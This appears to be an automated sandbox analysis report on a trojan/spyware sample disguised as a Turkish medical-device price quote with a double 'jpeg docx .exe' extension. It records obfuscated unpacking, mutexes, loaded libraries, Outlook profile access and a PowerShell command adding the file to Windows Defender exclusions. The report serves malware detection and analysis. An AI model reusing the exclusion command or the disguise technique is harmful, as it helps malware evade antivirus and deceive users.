                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, xmrLDZqAV6PyubMqxq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, xmrLDZqAV6PyubMqxq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.AddAccessRule
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.AddAccessRule
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, xmrLDZqAV6PyubMqxq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.SetAccessControl
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, fe9oobUXS7WXTS2K4g.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/6@4/4
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.logJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\IhxdpvubYkeoWdRituE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5ovbtyj.b2d.ps1Jump to behavior
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 23%
                    Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: kDme.pdbSHA256 source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: Binary string: kDme.pdb source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, fe9oobUXS7WXTS2K4g.cs.Net Code: CEA1l261kn System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, fe9oobUXS7WXTS2K4g.cs.Net Code: CEA1l261kn System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, fe9oobUXS7WXTS2K4g.cs.Net Code: CEA1l261kn System.Reflection.Assembly.Load(byte[])
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: 0xCD9CAC77 [Mon Apr 24 21:24:07 2079 UTC]
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_0622B624 push 14418B05h; ret 1_2_0622BB23
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_06228C20 push 1841D905h; ret 1_2_06228C33
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_0622BB10 push 14418B05h; ret 1_2_0622BB23
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A27A9 pushad ; iretd 1_2_079A27BC
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A83CC push E8FFFFFEh; retf 1_2_079A83D1
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: section name: .text entropy: 7.620022495811268
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, XhKakeKjJ0yW14dDAy.csHigh entropy of concatenated method names: 'Bfw3qbc85X', 'nl33WtVclG', 'q8i3fwic6C', 'YTr3IM7qRG', 'bYE3GMwN2c', 'brq3m5LxUH', 'yH83P3a6Sv', 'Q3V3E5S4gW', 'clr36LwmVJ', 'q3m3LvmkXa'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, vMGhyX1Yrfu5jATuwX.csHigh entropy of concatenated method names: 'UouHymrLDZ', 'fV6HUPyubM', 'IwQHoDT4qE', 'OmeHiqNgQm', 'y2pHFWL15N', 'Y0hH2ovkhN', 'uta8eviIwmbgbCs94m', 'DNEwmUzCjI1Fpr936x', 'ubXHHCHK9r', 'wiNHkBlC2G'
